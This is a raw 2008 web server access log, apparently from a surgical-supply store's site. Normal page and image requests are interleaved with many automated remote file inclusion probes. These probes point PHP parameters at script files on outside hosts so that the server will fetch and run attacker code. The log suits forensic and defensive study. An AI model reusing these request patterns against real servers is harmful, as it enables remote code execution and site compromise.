64.72.112.110 - - [03/Oct/2008:00:56:26 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.800"
65.254.44.210 - - [03/Oct/2008:00:56:30 -0400] "GET /logs/error_log.Q108082800/?CONFIG_EXT[LANGUAGES_DIR]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
216.97.227.50 - - [03/Oct/2008:00:56:49 -0400] "GET /logs/error_log.Q108082800/?CONFIG_EXT[LANGUAGES_DIR]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.814"
58.227.192.80 - - [03/Oct/2008:00:57:10 -0400] "GET /logs//twindow_notice.php?shop_this_skin_path=http://cilux.coolpage.biz/id.txt? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.227.192.80 - - [03/Oct/2008:00:57:11 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://cilux.coolpage.biz/id.txt? HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [03/Oct/2008:00:57:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.169.64.29 - - [03/Oct/2008:00:57:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
67.169.64.29 - - [03/Oct/2008:00:57:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
75.125.146.130 - - [03/Oct/2008:00:58:12 -0400] "GET /logs/access_log.Q108080500//s_loadenv.inc.php?DOCUMENT_ROOT=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:00:58:12 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:00:58:12 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 221 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:00:58:15 -0400] "GET /logs/access_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.61 [en] (OS/2; U)"
58.227.192.80 - - [03/Oct/2008:00:58:45 -0400] "GET //index.php?option=com_custompages&cpage=http://www.woong-ji.co.kr/bbs/bot.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
58.227.192.80 - - [03/Oct/2008:00:58:45 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.woong-ji.co.kr/bbs/bot.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.254.44.210 - - [03/Oct/2008:00:59:22 -0400] "GET /logs/error_log.Q108060300/?REX[INCLUDE_PATH]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
65.254.44.210 - - [03/Oct/2008:00:59:22 -0400] "GET /?REX[INCLUDE_PATH]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.811"
65.254.44.210 - - [03/Oct/2008:00:59:22 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 200 68150 "-" "libwww-perl/5.811"
74.53.127.68 - - [03/Oct/2008:00:59:31 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:00:59:31 -0400] "GET /logs/access_log.Q108080500//s_loadenv.inc.php?DOCUMENT_ROOT=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:00:59:31 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:00:59:39 -0400] "GET /logs/access_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
216.97.227.50 - - [03/Oct/2008:01:00:22 -0400] "GET /logs/error_log.Q108060300/?REX[INCLUDE_PATH]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.814"
216.97.227.50 - - [03/Oct/2008:01:00:22 -0400] "GET /?REX[INCLUDE_PATH]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.814"
216.97.227.50 - - [03/Oct/2008:01:00:22 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 200 68150 "-" "libwww-perl/5.814"
66.249.67.114 - - [03/Oct/2008:01:00:34 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64450 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.227.192.80 - - [03/Oct/2008:01:00:43 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.civilcourt.or.kr//bbs/idih.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
58.227.192.80 - - [03/Oct/2008:01:00:43 -0400] "GET /logs/error_log.Q108092800//twindow_notice.php?shop_this_skin_path=http://www.civilcourt.or.kr//bbs/idih.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
58.227.192.80 - - [03/Oct/2008:01:00:43 -0400] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.civilcourt.or.kr//bbs/idih.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
209.59.12.99 - - [03/Oct/2008:01:02:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.254.44.210 - - [03/Oct/2008:01:03:15 -0400] "GET /logs/error_log.Q108081700/?REX[INCLUDE_PATH]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
62.213.195.36 - - [03/Oct/2008:01:03:17 -0400] "GET //postscript/postscript.php?p_mode=http://weblime.ru/seahorse/joomla??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
62.213.195.36 - - [03/Oct/2008:01:03:17 -0400] "GET /logs//postscript/postscript.php?p_mode=http://weblime.ru/seahorse/joomla??? HTTP/1.1" 404 229 "-" "Avant Browser (http://www.avantbrowser.com)"
58.227.192.80 - - [03/Oct/2008:01:03:40 -0400] "GET /logs/error_log.Q108092600//twindow_notice.php?shop_this_skin_path=http://www.civilcourt.or.kr//bbs/idih.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.198.63.60 - - [03/Oct/2008:01:04:14 -0400] "GET /logs/access_log.Q108071400//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.65"
213.198.63.60 - - [03/Oct/2008:01:04:14 -0400] "GET //sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
213.198.63.60 - - [03/Oct/2008:01:04:15 -0400] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
216.97.227.50 - - [03/Oct/2008:01:04:41 -0400] "GET /logs/error_log.Q108081700/?REX[INCLUDE_PATH]=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.814"
74.52.139.226 - - [03/Oct/2008:01:04:49 -0400] "GET /logs/error_log.Q108090100/lostpasswd.php?env[include_prefix]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:01:04:49 -0400] "GET /lostpasswd.php?env[include_prefix]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:01:04:49 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 217 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:01:04:56 -0400] "GET /logs/access_log.Q108090100/lostpasswd.php?env[include_prefix]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
78.159.111.131 - - [03/Oct/2008:01:05:59 -0400] "GET /logs/access_log.Q108081900/main.php?pagina=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:01:05:59 -0400] "GET /logs/access_log.Q108091900/main.php?pagina=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:01:05:59 -0400] "GET /logs/main.php?pagina=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:01:05:59 -0400] "GET /main.php?pagina=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
76.9.3.130 - - [03/Oct/2008:01:06:13 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
76.9.3.130 - - [03/Oct/2008:01:06:13 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
66.11.230.32 - - [03/Oct/2008:01:06:26 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
66.11.230.32 - - [03/Oct/2008:01:06:26 -0400] "GET //e404.php?INCLUDE_FOLDER=http://x0x1.webcindario.com/tst.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
213.198.63.60 - - [03/Oct/2008:01:07:57 -0400] "GET /logs/error_log.Q108082400//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.65"
213.198.63.60 - - [03/Oct/2008:01:07:57 -0400] "GET //sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
213.198.63.60 - - [03/Oct/2008:01:07:57 -0400] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
209.59.12.99 - - [03/Oct/2008:01:07:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.216.167.181 - - [03/Oct/2008:01:08:15 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
213.198.63.60 - - [03/Oct/2008:01:08:30 -0400] "GET /logs/access_log.Q108082400//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.65"
207.216.167.181 - - [03/Oct/2008:01:08:41 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting%20screw HTTP/1.1" 200 52550 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:43 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:43 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:43 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:45 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:45 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:45 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:45 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:45 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:46 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:46 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:46 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:46 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:46 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:46 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:46 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:46 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:47 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:47 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:47 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:47 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:47 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:48 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:48 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:48 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:48 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:48 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:08:49 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
66.172.9.3 - - [03/Oct/2008:01:08:54 -0400] "GET /logs/access_log.Q108053100/task.php?task=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:08:54 -0400] "GET /task.php?task=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:08:54 -0400] "GET /logs/access_log.Q108053100/task.php?task=http://vnc2009.webcindario.com/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:08:54 -0400] "GET /logs/task.php?task=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:08:54 -0400] "GET /task.php?task=http://vnc2009.webcindario.com/id.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
